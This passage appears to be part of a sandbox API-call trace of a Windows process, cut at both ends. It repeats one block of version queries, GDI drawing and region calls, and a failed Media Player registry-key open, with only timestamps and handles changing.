lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.503] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.503] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.503] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.503] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.503] BeginPath (hdc=0x0) returned 0 [0090.503] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.503] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.503] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.503] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.503] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.503] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.503] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.503] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.503] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x550401dc [0090.503] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x570401d9 [0090.503] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458b1 [0090.503] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458b2 [0090.503] CombineRgn (hrgnDst=0x10458b1, hrgnSrc1=0x550401dc, hrgnSrc2=0x570401d9, iMode=1) returned 1 [0090.503] CombineRgn (hrgnDst=0x10458b2, hrgnSrc1=0x550401dc, hrgnSrc2=0x570401d9, iMode=4) returned 2 [0090.503] CreateSolidBrush (color=0xff) returned 0x21058b0 [0090.503] CreateSolidBrush (color=0xff0000) returned 0x11058b3 [0090.503] DeleteObject (ho=0x11058b3) returned 1 [0090.503] DeleteObject (ho=0x570401d9) returned 1 [0090.503] DeleteObject (ho=0x550401dc) returned 1 [0090.503] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.503] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.504] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.504] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.504] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.504] BeginPath (hdc=0x0) returned 0 [0090.504] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.504] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.504] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.504] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.504] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.504] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.504] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.504] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.504] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x580401d9 [0090.504] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x560401dc [0090.504] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458b4 [0090.504] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458b5 [0090.504] CombineRgn (hrgnDst=0x10458b4, hrgnSrc1=0x580401d9, hrgnSrc2=0x560401dc, iMode=1) returned 1 [0090.504] CombineRgn (hrgnDst=0x10458b5, hrgnSrc1=0x580401d9, hrgnSrc2=0x560401dc, iMode=4) returned 2 [0090.504] CreateSolidBrush (color=0xff) returned 0x21058b3 [0090.504] CreateSolidBrush (color=0xff0000) returned 0x11058b6 [0090.504] DeleteObject (ho=0x11058b6) returned 1 [0090.504] DeleteObject (ho=0x560401dc) returned 1 [0090.504] DeleteObject (ho=0x580401d9) returned 1 [0090.504] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.504] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.504] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.504] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.504] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.504] BeginPath (hdc=0x0) returned 0 [0090.505] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.505] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.505] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.505] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.505] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.505] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.505] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.505] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.715] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x570401dc [0090.715] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x590401d9 [0090.715] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x940458ec [0090.715] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x910458ef [0090.715] CombineRgn (hrgnDst=0x940458ec, hrgnSrc1=0x570401dc, hrgnSrc2=0x590401d9, iMode=1) returned 1 [0090.715] CombineRgn (hrgnDst=0x910458ef, hrgnSrc1=0x570401dc, hrgnSrc2=0x590401d9, iMode=4) returned 2 [0090.715] CreateSolidBrush (color=0xff) returned 0x21058b6 [0090.715] CreateSolidBrush (color=0xff0000) returned 0x11058f0 [0090.715] DeleteObject (ho=0x11058f0) returned 1 [0090.716] DeleteObject (ho=0x590401d9) returned 1 [0090.716] DeleteObject (ho=0x570401dc) returned 1 [0090.716] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.716] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.716] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.716] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.716] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.716] BeginPath (hdc=0x0) returned 0 [0090.716] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.716] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.716] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.716] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.716] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.716] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.716] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.716] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.716] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5a0401d9 [0090.716] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x580401dc [0090.716] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458f1 [0090.716] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458f2 [0090.716] CombineRgn (hrgnDst=0x10458f1, hrgnSrc1=0x5a0401d9, hrgnSrc2=0x580401dc, iMode=1) returned 1 [0090.716] CombineRgn (hrgnDst=0x10458f2, hrgnSrc1=0x5a0401d9, hrgnSrc2=0x580401dc, iMode=4) returned 2 [0090.716] CreateSolidBrush (color=0xff) returned 0x21058f0 [0090.716] CreateSolidBrush (color=0xff0000) returned 0x11058f3 [0090.716] DeleteObject (ho=0x11058f3) returned 1 [0090.716] DeleteObject (ho=0x580401dc) returned 1 [0090.717] DeleteObject (ho=0x5a0401d9) returned 1 [0090.717] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.717] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.717] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.717] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.717] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.717] BeginPath (hdc=0x0) returned 0 [0090.717] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.717] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.717] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.717] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.717] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.717] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.717] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.717] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.717] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x590401dc [0090.717] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5b0401d9 [0090.717] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458f4 [0090.717] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458f5 [0090.717] CombineRgn (hrgnDst=0x10458f4, hrgnSrc1=0x590401dc, hrgnSrc2=0x5b0401d9, iMode=1) returned 1 [0090.717] CombineRgn (hrgnDst=0x10458f5, hrgnSrc1=0x590401dc, hrgnSrc2=0x5b0401d9, iMode=4) returned 2 [0090.717] CreateSolidBrush (color=0xff) returned 0x21058f3 [0090.717] CreateSolidBrush (color=0xff0000) returned 0x11058f6 [0090.717] DeleteObject (ho=0x11058f6) returned 1 [0090.717] DeleteObject (ho=0x5b0401d9) returned 1 [0090.718] DeleteObject (ho=0x590401dc) returned 1 [0090.718] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.718] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.718] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.718] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.718] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.718] BeginPath (hdc=0x0) returned 0 [0090.718] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.718] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.718] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.718] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.718] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.718] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.718] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.718] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.718] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5c0401d9 [0090.718] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5a0401dc [0090.718] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458f7 [0090.718] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458f8 [0090.718] CombineRgn (hrgnDst=0x10458f7, hrgnSrc1=0x5c0401d9, hrgnSrc2=0x5a0401dc, iMode=1) returned 1 [0090.718] CombineRgn (hrgnDst=0x10458f8, hrgnSrc1=0x5c0401d9, hrgnSrc2=0x5a0401dc, iMode=4) returned 2 [0090.718] CreateSolidBrush (color=0xff) returned 0x21058f6 [0090.718] CreateSolidBrush (color=0xff0000) returned 0x11058f9 [0090.718] DeleteObject (ho=0x11058f9) returned 1 [0090.718] DeleteObject (ho=0x5a0401dc) returned 1 [0090.718] DeleteObject (ho=0x5c0401d9) returned 1 [0090.718] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.718] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.719] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.719] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.719] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.719] BeginPath (hdc=0x0) returned 0 [0090.719] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.719] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.719] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.719] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.719] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.719] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.719] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.719] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.719] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5b0401dc [0090.719] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5d0401d9 [0090.719] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458fa [0090.719] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458fb [0090.719] CombineRgn (hrgnDst=0x10458fa, hrgnSrc1=0x5b0401dc, hrgnSrc2=0x5d0401d9, iMode=1) returned 1 [0090.719] CombineRgn (hrgnDst=0x10458fb, hrgnSrc1=0x5b0401dc, hrgnSrc2=0x5d0401d9, iMode=4) returned 2 [0090.719] CreateSolidBrush (color=0xff) returned 0x21058f9 [0090.719] CreateSolidBrush (color=0xff0000) returned 0x11058fc [0090.719] DeleteObject (ho=0x11058fc) returned 1 [0090.719] DeleteObject (ho=0x5d0401d9) returned 1 [0090.719] DeleteObject (ho=0x5b0401dc) returned 1 [0090.719] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.719] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.719] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.719] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.719] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.720] BeginPath (hdc=0x0) returned 0 [0090.720] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.720] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.720] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.720] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.720] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.720] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.720] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.720] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.720] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5e0401d9 [0090.720] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5c0401dc [0090.720] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458fd [0090.720] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10458fe [0090.720] CombineRgn (hrgnDst=0x10458fd, hrgnSrc1=0x5e0401d9, hrgnSrc2=0x5c0401dc, iMode=1) returned 1 [0090.720] CombineRgn (hrgnDst=0x10458fe, hrgnSrc1=0x5e0401d9, hrgnSrc2=0x5c0401dc, iMode=4) returned 2 [0090.720] CreateSolidBrush (color=0xff) returned 0x21058fc [0090.720] CreateSolidBrush (color=0xff0000) returned 0x11058ff [0090.720] DeleteObject (ho=0x11058ff) returned 1 [0090.720] DeleteObject (ho=0x5c0401dc) returned 1 [0090.720] DeleteObject (ho=0x5e0401d9) returned 1 [0090.720] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.720] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.720] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.720] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.720] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.720] BeginPath (hdc=0x0) returned 0 [0090.720] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.720] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.720] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.721] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.721] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.721] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.721] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.721] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.721] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5d0401dc [0090.721] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5f0401d9 [0090.721] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045900 [0090.721] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045901 [0090.721] CombineRgn (hrgnDst=0x1045900, hrgnSrc1=0x5d0401dc, hrgnSrc2=0x5f0401d9, iMode=1) returned 1 [0090.721] CombineRgn (hrgnDst=0x1045901, hrgnSrc1=0x5d0401dc, hrgnSrc2=0x5f0401d9, iMode=4) returned 2 [0090.721] CreateSolidBrush (color=0xff) returned 0x21058ff [0090.721] CreateSolidBrush (color=0xff0000) returned 0x1105902 [0090.721] DeleteObject (ho=0x1105902) returned 1 [0090.721] DeleteObject (ho=0x5f0401d9) returned 1 [0090.721] DeleteObject (ho=0x5d0401dc) returned 1 [0090.721] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.721] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.721] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.721] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.721] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.721] BeginPath (hdc=0x0) returned 0 [0090.721] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.721] 